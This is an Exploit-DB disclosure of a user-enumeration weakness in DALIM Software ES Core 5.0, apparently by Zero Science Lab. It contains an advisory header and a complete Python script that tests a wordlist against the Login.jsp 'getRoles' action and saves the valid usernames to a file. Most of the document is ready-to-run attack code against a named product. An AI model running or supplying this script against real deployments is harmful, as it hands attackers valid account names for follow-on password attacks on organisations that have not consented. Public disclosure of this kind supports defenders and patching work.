DALIM SOFTWARE ES Core 5.0 build 7184.1 - User Enumeration

EDB-ID:

42436

CVE:

N/A




Platform:

JSP

Date:

2017-08-09


#!/usr/bin/env python
#
#
# DALIM SOFTWARE ES Core 5.0 build 7184.1 User Enumeration Weakness
#
#
# Vendor: Dalim Software GmbH
# Product web page: https://www.dalim.com
# Affected version: ES/ESPRiT 5.0 (build 7184.1)
#                                 (build 7163.2)
#                                 (build 7163.0)
#                                 (build 7135.0)
#                                 (build 7114.1)
#                                 (build 7114.0)
#                                 (build 7093.1)
#                                 (build 7093.0)
#                                 (build 7072.0)
#                                 (build 7051.3)
#                                 (build 7051.1)
#                                 (build 7030.0)
#                                 (build 7009.0)
#                                 (build 6347.0)
#                                 (build 6326.0)
#                                 (build 6305.1)
#                                 (build 6235.9)
#                                 (build 6172.1)
#                   ES/ESPRiT 4.5 (build 6326.0)
#                                 (build 6144.2)
#                                 (build 5180.2)
#                                 (build 5096.0)
#                                 (build 4314.3)
#                                 (build 4314.0)
#                                 (build 4146.4)
#                                 (build 3308.3)
#                   ES/ESPRiT 4.0 (build 4202.0)
#                                 (build 4132.1)
#                                 (build 2235.0)
#                   ES/ESPRiT 3.0
#
# Summary: ES is the new Enterprise Solution from DALIM SOFTWARE built
# from the successful TWIST, DIALOGUE and MISTRAL product lines. The ES
# Core is the engine that can handle project tracking, JDF device workflow,
# dynamic user interface building, volume management. Each ES installation
# will have different features, depending on the license installed: online
# approval, prepress workflow, project tracking, imposition management...
#
# ES is a collaborative digital asset production and management platform,
# offering services ranging from online approval to web-based production
# environment for all participants of the production cycle, including brand
# owners, agencies, publishers, pre-media, printers and multichannel service
# provider. ES lets users plan, execute and control any aspect of media
# production, regardless of the final use of the output (print, web, ebook,
# movie, and others). It ensures productivity and longterm profitability.
#
# Desc: The weakness is caused due to the 'Login.jsp' script enumerating
# the list of valid usernames when some characters are provided via the
# 'login' parameter.
#
# Tested on: Red Hat Enterprise Linux Server release 7.3 (Maipo)
#            CentOS 7
#            Apache Tomcat/7.0.78
#            Apache Tomcat/7.0.67
#            Apache Tomcat/7.0.42
#            Apache Tomcat/6.0.35
#            Apache-Coyote/1.1
#            Java/1.7.0_80
#            Java/1.6.0_21
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             @zeroscience
#
#
# Advisory ID: ZSL-2017-5425
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5425.php
#
#
# 15.06.2017
#


import argparse
import requests
import sys

from colorama import Fore, Back, Style, init

init()

print 'User Enumeration Tool v0.3 for DALiM ES <= v5.0'
parser = argparse.ArgumentParser()
parser.add_argument('-t', help='target IP or hostname', action='store', dest='target')
parser.add_argument('-f', help='username wordlist', action='store', dest='file')

args = parser.parse_args()
if len(sys.argv) != 5:
	parser.print_help()
	sys.exit()

host = args.target
fn = args.file

try:
	users = open(args.file, 'r')
except(IOError):
	print '[!] Error opening \'' +fn+ '\' file.'
	sys.exit()
lines = users.read().splitlines()
print '[*] Loaded %d usernames for testing.\n' % len(open(fn).readlines())
users.close()
results = open('validusers.txt', 'w')

for line in lines:
	try:
		r = requests.post("http://" +host+ "/Esprit/public/Login.jsp", data={'actionRole' : 'getRoles', 'login' : line})
		print '[+] Testing username: ' +Fore.GREEN+line+Fore.RESET
		testingus = r.text[50:72]
		if testingus[19:20] != "\"":
			print '[!] Found ' +Style.BRIGHT+Fore.RED+line+Fore.RESET+Style.RESET_ALL+ ' as valid registered user.'
			results.write('%s\n' % line)
	except:
		print '[!] Error connecting to http://'+host
		sys.exit()

results.close()
print '\n[*] Enumeration completed!'
print '[*] Valid usernames successfully written to \'validusers.txt\' file.\n'